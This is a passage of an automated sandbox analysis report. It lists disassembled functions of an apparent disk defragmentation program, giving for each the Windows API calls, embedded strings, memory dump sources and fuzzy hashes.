                                                                                                                                                                                                                                                                                    • Instruction ID: 559a5a5f11ad9cbb26b2ef481da3000354db79d5173c1cf665cce4c119cf32f6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 057325de7599dd7353c85ea60434a88cbbf49cf5f83a7ab393cd0de2b9172bd1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C51C6712083419FD310EF20DD85BABB7F8AF88715F50092EF199921D1DB78AA49CB5A
                                                                                                                                                                                                                                                                                    Function 00422A90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422C04
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                    • String ID: DiskChecked$DiskDefrag$`=
                                                                                                                                                                                                                                                                                    • API String ID: 142774367-3347577070
                                                                                                                                                                                                                                                                                    • Opcode ID: d5e77d074dc722500c1b88aee6bf059e24061e9123afcca7327058d6b3c785ee
                                                                                                                                                                                                                                                                                    • Instruction ID: 0b9e0d0bd62f39a9103a5831cbb30b95e2098115bf74eedd830be0e4041926e5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5e77d074dc722500c1b88aee6bf059e24061e9123afcca7327058d6b3c785ee
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 644196313007059FC728EE2DDD85BAAB7E1BF84304F94852EED468F385DAB4B845C654
                                                                                                                                                                                                                                                                                    Function 00430EA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00430FF8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$DefragFinishRingtone$DiskDefrag\Setting Option\Gereral
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-840960858
                                                                                                                                                                                                                                                                                    • Opcode ID: 611e42f2e74a1490c92c656b9c1f4233f09f845737786cc1f03fb69b9647b0cb
                                                                                                                                                                                                                                                                                    • Instruction ID: 0a2994e761213e214e5a4d6a869241ea1e3b325438042f93d97e0811baed8686
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 611e42f2e74a1490c92c656b9c1f4233f09f845737786cc1f03fb69b9647b0cb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE41717074820566EA30B7725D23BAF21489F1CB98F00562FFA19953C2FBEDD885859F
                                                                                                                                                                                                                                                                                    Function 004222A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 004222D6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,?,?), ref: 00422367
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00422400
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 447f9f9946ccff9b1b99764a0f42122032f9790cb51c1b014e12d9a983ad3545
                                                                                                                                                                                                                                                                                    • Instruction ID: 003c1d75d670e48058873593885aa4881fdd5922b449336556b7ec6c7a2bda3d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 447f9f9946ccff9b1b99764a0f42122032f9790cb51c1b014e12d9a983ad3545
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43418071604311AFC710EF29E880AABB7E4FF88314F444A2EF959DB241D778A944CB95
                                                                                                                                                                                                                                                                                    Function 004258B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401129,?,0047D9D0,0047D9D0,0047D9D0), ref: 004259D2
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401130,0047D9D0,0047D9D0,0047D9D0,0047D9D0,?,?,?,?,?,?,?,?,?,?), ref: 00425A0B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 3401129$3401130
                                                                                                                                                                                                                                                                                    • API String ID: 0-1376210773
                                                                                                                                                                                                                                                                                    • Opcode ID: f75ec2c0ac9a0af7f618d4b75ecfcfa7dd7948d3cf15e991352d6c15fd79f6bb
                                                                                                                                                                                                                                                                                    • Instruction ID: 290a2bb6d7e4a4517d003926c088f46f9fe0c42f71943b9fab805552d124ffae
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f75ec2c0ac9a0af7f618d4b75ecfcfa7dd7948d3cf15e991352d6c15fd79f6bb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1141D8B1A04701AFC314EF54DD82F9BB7A8EF84714F104A2FFD5997281D778A8098799
                                                                                                                                                                                                                                                                                    Function 00461900 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004619BD
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,Disk Defrag,00040010), ref: 004619FE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastMessage
                                                                                                                                                                                                                                                                                    • String ID: %c:\$Disk Defrag
                                                                                                                                                                                                                                                                                    • API String ID: 463093485-3222931339
                                                                                                                                                                                                                                                                                    • Opcode ID: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                    • Instruction ID: 731faf273718486ffcde032920aca0e1f319cedce5eb76f7311323341e126d0a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E64195712087419FC324DF25D845B6BB7E4EF84715F044A2EF599C7290EB74A808CB9B
                                                                                                                                                                                                                                                                                    Function 0042EBC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000000,00000000), ref: 0042EC76
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000001,00000000), ref: 0042ECA3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042ECDA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LongNamePath$MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3461188054-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 02b7588f572fd549226da487b941490f7314d4176d4851207869953aa2da4a66
                                                                                                                                                                                                                                                                                    • Instruction ID: 9fdf5df9b511b0c67cbd5e6567facad5020a46183586509d2c0c406cb078a0d1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b7588f572fd549226da487b941490f7314d4176d4851207869953aa2da4a66
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41F231208301AFD321DF20DD86FABB7A8EF58710F50062DF559961E0DBB4A949CB9A
                                                                                                                                                                                                                                                                                    Function 00410B80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,?), ref: 00410C49
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%HOMEDRIVE%,?,0000000C), ref: 00410C8F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandInformationStringsVolume
                                                                                                                                                                                                                                                                                    • String ID: %HOMEDRIVE%$NTFS
                                                                                                                                                                                                                                                                                    • API String ID: 1751349637-3402063299
                                                                                                                                                                                                                                                                                    • Opcode ID: 074aaa8893bb910327e97c9f9852001168cb7cda255d028d6430084e15aab4d5
                                                                                                                                                                                                                                                                                    • Instruction ID: 637acb8aad6857eaaece39300668810a01c8d3601b07b0b48692e68ec32a0e85
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 074aaa8893bb910327e97c9f9852001168cb7cda255d028d6430084e15aab4d5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 224160706083019BD714DF75CA86BAB77E4AF88704F40493EB949C7291EBB8D984CB5A
                                                                                                                                                                                                                                                                                    Function 004320A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00432180: SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00432180: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,?,00000000), ref: 00432160
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$DiskDefrag\Setting Option\Optimize$cbbFileSize
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3449206993
                                                                                                                                                                                                                                                                                    • Opcode ID: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                    • Instruction ID: c484c337b78f61a7d82ad98e4e7a9c8d2f838ff1f30f5547f561464bca46b6c3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 530121707D021A2BEA147E7A8D93FBE01498B85B08F00993E760BDE2C7CDDD8D484229
                                                                                                                                                                                                                                                                                    Function 00402070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(00000000,0000008F), ref: 004020B8
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(00000000,0000008E), ref: 004020D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402A30: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402A30: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00402121
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BitmapLoad$FileInfo
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 945603440-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 6219d86c06f6b4ea9bab356f1641f6868412c7640f0c57d9bdc72cfda1377a77
                                                                                                                                                                                                                                                                                    • Instruction ID: 6e2bdab270fbbe96b848c0bd2341101d434f26038ac6356a5de8eec39d30edc5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6219d86c06f6b4ea9bab356f1641f6868412c7640f0c57d9bdc72cfda1377a77
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411737078071535E130B6B2CE4BFEA224CAF14B04F00452EB759BA1D2CDEC694042AE
                                                                                                                                                                                                                                                                                    Function 004629B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,0000000C,0000000C,?,?,?,?,?,?,?,004619AE), ref: 004629EC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InformationVolume
                                                                                                                                                                                                                                                                                    • String ID: FAT$FAT16$FAT32
                                                                                                                                                                                                                                                                                    • API String ID: 2039140958-3969911809
                                                                                                                                                                                                                                                                                    • Opcode ID: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                    • Instruction ID: 45468f2d8361374e2203d088d382e4daaec04f6418c830f46f854969d88bf3c3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
